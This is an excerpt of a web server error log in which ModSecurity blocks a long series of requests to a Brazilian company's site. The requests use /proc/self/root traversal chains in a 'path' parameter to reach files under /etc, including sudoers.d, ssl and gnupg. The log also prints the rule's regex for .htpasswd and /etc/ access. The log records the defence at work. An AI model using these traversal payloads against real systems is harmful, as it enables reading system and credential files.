"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheTrysWC90G-1nBrBXrQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:31.431323 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:59236] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheU7ysWC90G-1nBrBXsgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:32.768790 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:35864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheVM_BxrYCr4hPDw_-HAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:33.906283 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:35868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheVdSswJuvopo3lOhy6gAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:35.253422 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:35882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheV_9ocpUE4ed4uDwGjwAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:36.471871 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.241.46:35884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheWEr9dMAiw-8KANNa1AAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:37.876365 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:35886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheWaQpVkWug9HeOt9JHwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:39.088587 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:50068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheW1ajLEzk2WiQ-10m9QAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:41.717125 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:50082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheXdSswJuvopo3lOhy8AAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:43.022052 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:50084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheX6QpVkWug9HeOt9JIQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:44.202301 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.241.46:50096] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheYEr9dMAiw-8KANNa1wAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:45.439661 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:50102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheYaQpVkWug9HeOt9JIgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:47.943076 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:50104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheY46lpbStxTqkSkt-TgAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:49.473835 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:39972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheZf9ocpUE4ed4uDwGlQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:50.733553 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.241.46:39976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheZlajLEzk2WiQ-10m-wAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:52.115830 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:39982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheaP9ocpUE4ed4uDwGlwAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:53.327463 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.241.46:39990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheaUr9dMAiw-8KANNa3QAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:54.569802 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:40004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhearysWC90G-1nBrBXuAAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:55.879392 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:40016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhea9SswJuvopo3lOhy8gAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:58.395108 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:40022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheblajLEzk2WiQ-10m_gAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:47:59.854961 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:40882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheb7ysWC90G-1nBrBXuwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:48:00.533861 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.243.203:40122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhecKTCbgAP5jq5TehAowAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
